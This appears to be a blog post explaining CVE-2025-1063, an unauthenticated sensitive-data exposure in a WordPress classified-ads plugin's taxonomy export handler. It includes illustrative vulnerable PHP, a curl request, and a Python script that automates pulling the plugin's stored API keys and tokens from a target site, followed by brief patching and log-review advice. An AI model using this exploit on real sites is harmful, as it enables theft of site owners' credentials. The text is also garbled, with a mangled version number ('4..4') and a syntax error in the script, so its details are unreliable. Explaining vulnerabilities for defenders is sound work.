CVE-2025-1063 - Exploiting Sensitive Data Exposure in The Classified Listing – Classified Ads & Business Directory Plugin for WordPress (Up to v4..4)
WordPress powers millions of websites, and plugins bring essential features to site owners. But what happens when a plugin has a vulnerability that leaks sensitive data? That’s the case with CVE-2025-1063, a vulnerability affecting all versions of the "Classified Listing – Classified ads & Business Directory Plugin" up to 4..4. This bug lets attackers—without needing to log in—steal sensitive information like API keys and tokens. Let’s break down how this works, how dangerous it is, and what you should do about it.
What’s the Issue?
The problem is with a PHP function called rtcl_taxonomy_settings_export. This function is meant to export taxonomy settings for the plugin. However, there aren’t enough checks in place. Anyone—yes, even someone who isn’t logged in—can trigger this function and get the exported data, which includes sensitive information.
Official Advisory
- Wordfence Advisory
- CVE-2025-1063 at CVE.org
How Does the Exploit Work?
Attackers can simply send a request to the website targeting the export action, and sensitive data gets delivered right back in the response.
The Core Problem in Code
Here’s a simplified (and safe) version of what the vulnerable code might look like inside the plugin’s file:
// Exposed function in plugin (simplified)
function rtcl_taxonomy_settings_export() {
// No authentication/authorization checks!
$settings = get_option('rtcl_taxonomy_settings');
header('Content-Type: application/json');
echo json_encode($settings);
exit;
}
// Hook the function to a public action or AJAX handler
add_action('wp_ajax_nopriv_rtcl_taxonomy_settings_export', 'rtcl_taxonomy_settings_export');
Key Takeaway:
*There's no check to see whether the requesting user is authorized or even logged in. Anyone can call this function and get whatever is stored in those settings, including private API keys, tokens, and potentially sensitive business info.*
Attackers could exploit the vulnerability using a simple HTTP request (for example, with curl)
curl https://TARGETSITE.com/wp-admin/admin-ajax.php?action=rtcl_taxonomy_settings_export
If the site is running a vulnerable version of the plugin, this command dumps the plugin's configuration, including sensitive data, right into the terminal.
Here’s a simple Python script that automates the exploit
import requests
def exploit(url):
target = f"{url}/wp-admin/admin-ajax.php?action=rtcl_taxonomy_settings_export"
response = requests.get(target)
if response.status_code == 200:
print("[+] Got data:")
print(response.text)
else:
print("[-] Exploit failed.")
# Example usage
exploit("https://victimsite.com";)
Check Your Logs:
Look for suspicious access to /wp-admin/admin-ajax.php?action=rtcl_taxonomy_settings_export.
Reset Secret Keys:
If your data was exposed, change/revoke any leaked API keys or tokens.
Links and References
- Plugin WP.org Page
- Wordfence Vulnerability Post
- CVE-2025-1063 at CVE.org
- Update Notice from RadiusTheme
- Mitre NVD Entry (when published)
Closing Thoughts
Vulnerabilities like CVE-2025-1063 show why it’s vital to update plugins regularly—even ones you trust and have used for years. This bug put thousands of businesses at risk of having their most sensitive data stolen with a single, unauthenticated request. Patch now, audit your sites, and remind your friends and clients: Don’t leave updates for tomorrow!
Stay safe out there!
*Exclusive for StackPostAI – Original, simple breakdown by a security enthusiast focused on helping WordPress users.*
Timeline
Published on: 02/25/2025 07:15:17 UTC
Last modified on: 02/28/2025 16:07:01 UTC